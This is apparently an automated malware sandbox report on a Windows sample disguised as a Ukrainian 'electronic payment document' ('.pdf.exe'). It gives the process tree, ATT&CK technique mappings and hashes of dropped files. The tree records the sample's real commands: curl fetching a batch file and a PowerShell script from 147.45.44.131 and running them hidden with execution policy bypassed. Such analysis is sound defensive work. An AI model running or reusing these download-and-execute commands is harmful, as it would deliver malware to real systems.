  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,5693055196560105641,9120421139687500322,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6228 /prefetch:1
  2⤵
  PID:2332
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,5693055196560105641,9120421139687500322,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5548 /prefetch:1
  2⤵
  PID:4056
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,5693055196560105641,9120421139687500322,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4836 /prefetch:1
  2⤵
  PID:4756
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,5693055196560105641,9120421139687500322,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5324 /prefetch:1
  2⤵
  PID:5540
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,5693055196560105641,9120421139687500322,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6260 /prefetch:1
  2⤵
  PID:4804
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,5693055196560105641,9120421139687500322,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3108 /prefetch:1
  2⤵
  PID:3512
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,5693055196560105641,9120421139687500322,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4952 /prefetch:1
  2⤵
  PID:1488
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,5693055196560105641,9120421139687500322,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6312 /prefetch:1
  2⤵
  PID:5240
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,5693055196560105641,9120421139687500322,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5912 /prefetch:1
  2⤵
  PID:4148
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2076,5693055196560105641,9120421139687500322,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=2948 /prefetch:8
  2⤵
  PID:2772
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,5693055196560105641,9120421139687500322,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6588 /prefetch:1
  2⤵
  PID:4136

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2256

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2084

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:1852

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\Електронний платіжний документ\Електронний платіжний документ\Електронний платіжний документ\" -spe -an -ai#7zMap26664:246:7zEvent18488
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:5736

C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Downloads\Електронний платіжний документ\Електронний платіжний документ\Код доступу 398558.txt
1⤵
- Suspicious use of FindShellTrayWindow
PID:736

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x3e0 0x150
1⤵
PID:3876

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:4752
- C:\Windows\system32\NOTEPAD.EXE
  "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Downloads\Електронний платіжний документ\Електронний платіжний документ\Електронний платіжний документ\iviewers.dll
  2⤵
  PID:3880

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:6012
- C:\Program Files\Internet Explorer\iexplore.exe
  "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\Downloads\Електронний платіжний документ\Електронний платіжний документ\Електронний платіжний документ\iviewers.dll
  2⤵
  - Modifies Internet Explorer Phishing Filter
  - Modifies Internet Explorer settings
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SetWindowsHookEx
  PID:5424
- - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
    "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:5424 CREDAT:17410 /prefetch:2
    3⤵
    - System Location Discovery: System Language Discovery
    - Modifies Internet Explorer settings
    - Suspicious use of SetWindowsHookEx
    PID:5600

C:\Users\Admin\Downloads\Електронний платіжний документ\Електронний платіжний документ\Електронний платіжний документ\Електронний платіжний документ.pdf.exe
"C:\Users\Admin\Downloads\Електронний платіжний документ\Електронний платіжний документ\Електронний платіжний документ\Електронний платіжний документ.pdf.exe"
1⤵
- Checks computer location settings
- Drops startup file
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:5728
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ivpnwwdq\ivpnwwdq.cmdline"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:5056
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
    C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5D5D.tmp" "c:\Users\Admin\AppData\Local\Temp\ivpnwwdq\CSC673D2C52A045453AA51B3EBA891B1164.TMP"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4188
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c cd C:\Windows\Temp\ & curl -o DeleteApp.bat http://147.45.44.131/infopage/inbt.bat -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" & start DeleteApp.bat
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3508
- - C:\Windows\SysWOW64\curl.exe
    curl -o DeleteApp.bat http://147.45.44.131/infopage/inbt.bat -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq"
    3⤵
    PID:5280
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /K DeleteApp.bat
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1972
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c curl -s -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/ybvfk.ps1
      4⤵
      System Location Discovery: System Language Discovery
      PID:4704
    - - C:\Windows\SysWOW64\curl.exe
        
        curl -s -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/ybvfk.ps1
        5⤵
        
        PID:2128
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command -"
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      Suspicious use of SetThreadContext
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2500
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\rvcva2xn\rvcva2xn.cmdline"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:5688
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6B09.tmp" "c:\Users\Admin\AppData\Local\Temp\rvcva2xn\CSCC3223E4CE63B414A82359EFECC1CB84D.TMP"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:1452
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: GetForegroundWindowSpam
        Suspicious use of SetWindowsHookEx
        
        PID:388

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
1⤵
- Drops startup file
- Checks SCSI registry key(s)
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:768

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Browser Information Discovery

T1217

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\rmc\logs.dat

Filesize
512B

MD5
60683d99b0262c41140b062928b8c32b

SHA1
8957ebb00f5ecd6036a7c7ddc32e78860cbbd5a4

SHA256
fb7b9d355048f2de47b7b0c7439104c5455ce7a56edf7ad462252982821ca54b

SHA512
1c7b626254e704f733978cd43c3d43e825c19ac0af99af4a7e458a5da8dfa31960c8db7510b1cf7da0b14667dfc2944dcb869c18da2bf9d4d56a2c83b2cc2713

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
56a4f78e21616a6e19da57228569489b

SHA1
21bfabbfc294d5f2aa1da825c5590d760483bc76

SHA256
d036661e765ee8fd18978a2b5501e8df6b220e4bca531d9860407555294c96fb

SHA512
c2c3cd1152bb486028fe75ab3ce0d0bc9d64c4ca7eb8860ddd934b2f6e0140d2c913af4fa082b88e92a6a6d20fd483a1cb9813209f371a0f56374bc97d7f863b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
e443ee4336fcf13c698b8ab5f3c173d0

SHA1
9bf70b16f03820cbe3158e1f1396b07b8ac9d75a

SHA256
79e277da2074f9467e0518f0f26ca2ba74914bee82553f935a0ccf64a0119e8b

SHA512
cbf6f6aa0ea69b47f51592296da2b7be1180e7b483c61b4d17ba9ee1a2d3345cbe0987b96f4e25de1438b553db358f330aad8a26e8522601f055c3d5a8313cdd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\7b0b6884-c894-488d-acb9-048b6a7e89f9.tmp

Filesize
1KB

MD5
658a38eeffe7eecdbfad303080da5b03

SHA1
f343a40bef019201d8740aa9622a84a03d0b1580

SHA256
a92a1f649c82ecdaadccb28bfcd68f2e701d862515cc3cabd1f2b44c237549fa

SHA512
3177bc395c031bcd781de8afd4cf5c6078c84399d514e685f6daf85f5a28861463f05a1eeb62ae5224539e8cceabd036a298bec933857e84a676bc851adfcf27

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
768B

MD5
c813ff698c13cd87c29256a83bc45773

SHA1
106b39f4043e871905bf594b28565fef569f83cd

SHA256
0ef688cf14ef65cca9ca80a8457e5312df130b39265cdc282fdba40104c8016b

SHA512
388590a83914886e4a1401d36a405349bfa8602421084eec026863d72cb5bb81d3b6309f7a633b1cece12ffee2fe9d8b082317297487805d2ddf7c54c18a7d31

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
1KB

MD5
80e55c2c394a8477f30973a825fb85b7

SHA1
2b74c883d2d87977df58893e60f8b82f17494aa9

SHA256
b365183e79ee8c5410580761b6628f99d85c0d038b49642d2b5f430f9416c6ab

SHA512
d88021fb1eab9eb0e7d81b49be1c41669788f9bb6deea88fee44c63b2369f3af1c75081fca277384469eda2512eddf71c62b4157c04b7b3a57e36fc0fcbc2e9b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
1KB

MD5
754574be92cf407faa1a4bd0a2ba8062

SHA1
b29ac3e931bb9bca68d734fdd6862c70eb6d02a7

SHA256
df5b98cf63ae19684da637af02ca87a75d6fac9aaaa559f786665daa4516d917

SHA512
61719a0fed311d3b4283ec6a155160c902edb28a7c31dc75497681d9ae800cf46fdf67a5a6f6f640e613a8b780ed5bcbf79f3bf9350167a3aee5b109b23c1777

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
2KB

MD5
f35ae1f9c4def8c114559c4c27ea7780

SHA1
fe4fd4db3ebc8cea85b6397ca0ffe8115a4fc959

SHA256
06ac83c6dd701a95f7999f0fcc86c4bdef7e3ebb74a16c3559d7dd1d04f6e5d9

SHA512
9969d157fa6b1a019b2bafdbbacfb45236a7e729ee42ce378a95e50de868a9dd1eeb014f05dd030bc3f099a8d20693d604f710590a42dbed35579de7cd8aa6a9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
2KB

MD5
62aed660c49928c569931ddab8364651

SHA1
b85ff6f739447f6a94b58e5b09829e43601036aa

SHA256
e92e925b4422a0cd19b08e3d359580fa1e5e8588cf36b784e8786aad9c0f152c

SHA512
7c2a296262944f277e5d3a25fef136b374119ac10a45563bb2148e089f6865a2d317b74987dd14b2a2a27ceb65ef3015c03c2b09fd715423c661c4c1cb372316

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
4KB

MD5
b52f85c77c657cdfa325b6db2a57440b

SHA1
ec3272f67a4667f304e02ada391da57707e045e9

SHA256
4043d2942525d5a4912af27eb2030d60f0b4064e19a4346de51ec8f3c9e0a60a

SHA512
27b88417fd53cf3b00def8dd3cab12093abe8cac32ff63b63815be018660583be16d8577a5fc4407a3778471e3a83a678064a9757955f34755c873f7c8295922

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
4KB

MD5
e43a81c7e616636a3c4f4a82f46bbbcd

SHA1
4dea6462da28833e7f1b543f5b182eca35346956

SHA256
1e6f519527e373431a40940898134a436e661f74b6efc44619f590b49497f727

SHA512
7b302a5985e81a4ff8d162285bcea72bfb37830f803dfb27066628e134a570573a7febe70a2c75c7b1a86e97dff4ccb238f499cd0b4d028716282d975d93af6e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
3KB

MD5
ba1608852748d19154c94324f41b8a9e

SHA1
492bf46c9d2c4c85ef6f7b95817bb60271e60694

SHA256
253454351b8787352337a193885ce1d1aed3cdb2550941335fb378d22ee0d2f8

SHA512
868170756744ba94bc4924e12fc26ccfd7b1c7ed359e1f13a86234d500557a722c68e40662aeb42216095c7c0c5711b7a9d9f1f4ddda7d9ba68d50d21a2de282

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
4KB

MD5
ac71315070c0d9358d8a7834a77e70ce

SHA1
c8cd82dd2ea9ee37345e534356fbc89bcf45b130

SHA256
4db664cc186419b004a6512182dd637f651c19f1d4e39ae868cb0d8c52e03316

SHA512
07b9ffcba53df295d6d59e731786987e0c971489c5d2ff8c86c3effe9f0427060c2ea6f9df865634b3cc19f49b5bdb9f42c94ebaf7c15e22f8fbf4329425698f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
4KB

MD5
8334e72934c7237cc58f0fdd3dcae400

SHA1
0689978397922ab1166e8fc3db8e228f3dd12153

SHA256
d131d4e057a3fdba8476ba2d19b24149477ced8e0707ee0b8fde03eca533958f

SHA512
eb92110c53ce6ebe2f2b9c2d289182933a64dc8d4ac6bb7569e5afd9b81359d277e47b08124bf86919f4839271eb5b655e2490fa359fb1e37ce79a4587bd9d85

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
2KB

MD5
555dcf7c5b6f239607cf8c6031273cd6

SHA1
9306c49ff9c892dabddd1c42dec6f5fa0f6b89a1

SHA256
976ccf95f11d4bebd56795d3c8fbfe83abd78bd2d200a74dc813d91046a76fbd

SHA512
b000f3c238643fd3c840b5e210f853046e13d4bb76522b9f5560f58adf3c568e13ac6dfd848fb370b1b575d63730487fc9331cb53d3b57fb9fcb9e2eb191bcbc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
2KB

MD5
14e1aa4253f443053045c2c102d505f8

SHA1
1180b24879f0dfa0e7a8a9e0a2c84024ac8f6d58

SHA256
59c664b7b6f1a1798c5a576fbd334a175cc1f79210449d7f8e4311139d8d94f5

SHA512
85badc2f8239d8c83beb09fbb86d001320155ccf972624052c9218a0befe42b93a468a67f3342c437883abf1a325fdfb73eccdc2413ac17a52ac0d123cfc96cc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
3b9ef293bc0d7e7251a20f8563690fd2

SHA1
1895e5e25f144342468fa9ce48fb87f5b2b44243

SHA256
0a7cba351ccc22b6c76a9b4bc4efb24e123704ea548e20e499447dd23abc1af1

SHA512
9917190d424c6a094a4a278cba3b35338c42fe5dff53a2a2418e1e7dc3f63845a3683e8fd16245f86de62721f3dea0b874e3f708a865899bfff737f7ffa094c8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
7KB

MD5
5e0ec0c9c997f9aa65110c96d63a18e0

SHA1
d9bdd2b5a32b6c4059d6dfb128863bd7c2c6eaf3

SHA256
71282e71afd0bc48b0752fbc9b3bda3dba948dc7bc1325ead4cc2ba9df1b50f7

SHA512
39db33cf350f6e7b98116ae736f78cd99a777cbe6868c49407debf4f8b3aa67ee5044c2e57ab8078ba0c5739734e1d1addcf76f2d44b59fd2fa3acf10288325e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
32d72b29bafe347ac18d0c03abdbe81d

SHA1
0153e088c837ce16b50e2fe1b6b6d68c72eed8d4

SHA256
b860fe70fdb2dada4aaf801003988f6c48988b49c27ed5d21d8c76c06b6fdf23

SHA512
253f6da61b0dc3588a7920f7dc615e3d825dcb09467b64037074d900e5f8464fb7d154caccb49a7a410e265fd65bad0968b92cd54be4922fe4894de4aeedea65

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
7KB

MD5
56201c4f5b9759f8b5bfc0017c89cb0f

SHA1
346b00a817d178e2c809b32d2a23595d253d4108

SHA256
360b98b9fe812c8ac8dcc3e7356278aecf1a9e27d4a1d48861d499ec673438ed

SHA512
06cd042869c15033dd73aeeb06f67c26235e766b00cd48ab9020587a98c44524fc6da3643dc1bf1fbbb5a9ce6877510efe4f6a90619e8df78ff99bcc73ca5761

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
906f1c45f8bafa1090d5760cb529c6b8

SHA1
96219f79238d8d09115f460aec26ed8b83456c85

SHA256
8b2b6f61685296f5d57c06a3059170232ab2307ee5c5611616315a152198b4a7

SHA512
8f174f64dca1b743fd55531dd6fcf3a4963833f0673226e252d9fdecae941e431ffbf5be9d28c5f961c1e78b060d1e737a998d4db0acf412444ce53289efba4b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
7KB

MD5
ff6ff30f43e478ba085b5ecf8999d14b

SHA1
bba3f482958ab51e28166ecc4ad5ff9e4bc4d745

SHA256
17152de2dcc3b33ff98a238d05f411134c7dbbba604e6f3ac10f48252fe4a43d

SHA512
a1d8879f55847f86913ddba49e78980e7b1c317d76e3f4c657ebf33b694ec2bc4e89b6e69e1a6f1e0f107b0cdd3efef80d1b577f9bce35bcc9fafb36e67426e0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
d66b1ddf6de3193fbf1bbd3f08f2592c

SHA1
8c70a12048bf2d92c903f0c6930b31e5975bccb2

SHA256
d45d195c146b97f22755b561ac314c855b28e2563cfba222e0e44650a8011762

SHA512
c9011a8b3fb2c522e41210217795c9d0d8a258fb655c589be5fa9adb3213bfdd55e4c8a6c4a65144edb50f5a77978c882208c2de08c541fdf2d2db69f2f203f4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
1KB

MD5
1744e1612ad074a71f8c5bcc56bd0c0a

SHA1
aaf26bd8a7cd2813d07c4721b4b1c85979f98157

SHA256
225db1fc5d04691f61863ae43030713e3dacbc9a464b7623737a2a25159a08da

SHA512
24cbd82c22a85f4fff23a81a4d9934746e5defb2da41e5efb383d3b5ce343055838ea1d3de2bd7c425d35bf4f5fd2730cf6c86fbe1443279d5293859796b8f48

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
1KB

MD5
713620083776cf852032109b6f24214b

SHA1
3252c37592047dfd8d257820a87a4b447a42f80c

SHA256
5331deff321329209674fc4315e7a5f6ceadb1b96e6895cd3d392381b489361a

SHA512
0c3945efeaaf58d86c0099cdd3cd8c87ecead0cd441d2b715df77e7ff300eccf3d6b39c679c9eb960d25abd8bff0f90a9fc288a0af1541c897f08f51c0b130de

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
1KB

MD5
f61a0d7f96a28c78d89b697b6b1056c9

SHA1
a580b31ac933dd104a2e5ef9426340774fbbd704

SHA256
34e6c09b54f1e6beb27639b338c905f389ca70320fbfe6675e6e4d80d501a80d

SHA512
047f3ee54ef9bd386f1268536affef59724f697371386479bb427cb004b9bc21bb04456c13d6d86b7d3cc6e74f4ba0f58efe7bdd794cd679dfeb2914b4ac8a23

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
1KB

MD5
806f9418a0b5c8f439bc4039e837aec7

SHA1
57da5d76b48063e8d52056aa07e113a53603cfe3

SHA256
39eafe682afe31cde49ee182453fa02deb12e57d55d1e6cabd54d52f7420c637

SHA512
86b43e725857ec9725cb7a0eda76e5f875bf0467e6f25eefb53e7608f78888b50f2213e4861318cf628a1a0c01d95467a0618969aef9188fd4c5b0340a910594

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
1KB

MD5
15c0020a3f5bc45c35a7c4f7cf78b726

SHA1
832f239a0ffc59ace7413357bd6dce5cb3eaf8a2

SHA256
e4b22c8818782e911b96995463940d59bfc5b474a6e608a8a6461a587645f9a9

SHA512
bcf3344f24937eb00be10152b2b26e79944a17f65bfb0a4fe0f2a1bb795c36419ec3f5a40fa2fd3ff4ff337ce71148ba08db2bc7486a2ead8f0012cddcd19b6a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe5f9870.TMP

Filesize
372B

MD5
8c505282c0d9c40ea6df23765eac5e21

SHA1
35c4e346986e13c7e55d30da613591ff59f44af3

SHA256
ef9f7808804bf9e4385eaecc0cbd4dabe1aa638634832bdadf94f316b709e868

SHA512
b7699823346d392d024eef1867603d8dba309ab8575c157f0dcf879534b58dbce935743704d85a7c48518fee126738262bf95b29600579fa552496cac5ee1e4e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
46295cac801e5d4857d09837238a6394

SHA1
44e0fa1b517dbf802b18faf0785eeea6ac51594b

SHA256
0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

SHA512
8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
206702161f94c5cd39fadd03f4014d98

SHA1
bd8bfc144fb5326d21bd1531523d9fb50e1b600a

SHA256
1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167

SHA512
0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
09d4ba1c2f7136d701259fe70818efd6

SHA1
1170dd91e081bf23d406942ba8637f78768cfe76

SHA256
eb7821f0b4f408a628db5f1d92f2a360a2a5ca120c26ff8387084f8e109554bc

SHA512
31c0cc65c2be3935fa70409d699e280174157002ade1a6369017f5bc7cb476b0d6de53929414fd3cbb605f8b1de428778842b8bab9d5b7ffa738c2ffcd187272

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
70e2c440a962345ba6b38fe44522d4c3

SHA1
ba1590faa04ec4be76704240a23b38f6e802c1cf

SHA256
c3d5311ea83c343ce303d3f6c450b15222ed1ebaf36253da4894c1cccbe35a41

SHA512
c3381a90f4098313da004ec2ffe4ac5a177a118416ab9aee91235fe48f94e29cfe82c7633b64d104968c99a2faed598a05cbfcb0291be06af05386dba905b267

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
81c2177b1c31bbc1302840c82f35e50e

SHA1
27d5135109b2ca8bfb6ae9087c4ae3908cc5dd78

SHA256
757e264e41a35b3af7d50b378a2a41811f262b8b0eec9765a63db789f2586524

SHA512
ece7a53906032cfdf3b49248e6653e254c50faafb9d78b54a38a14faf54095b0e1033248f5312ae71bc396711d769516a922be0195609c5bdf6f392528c59c34

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
b6db890891a7a842bb881095fc6d2778

SHA1
71e62909b0b45845681a1705cff13b692488ab2b

SHA256
63ed159d93236484825a35c242315163fdccc987bea57804714cafde3a2d0538

SHA512
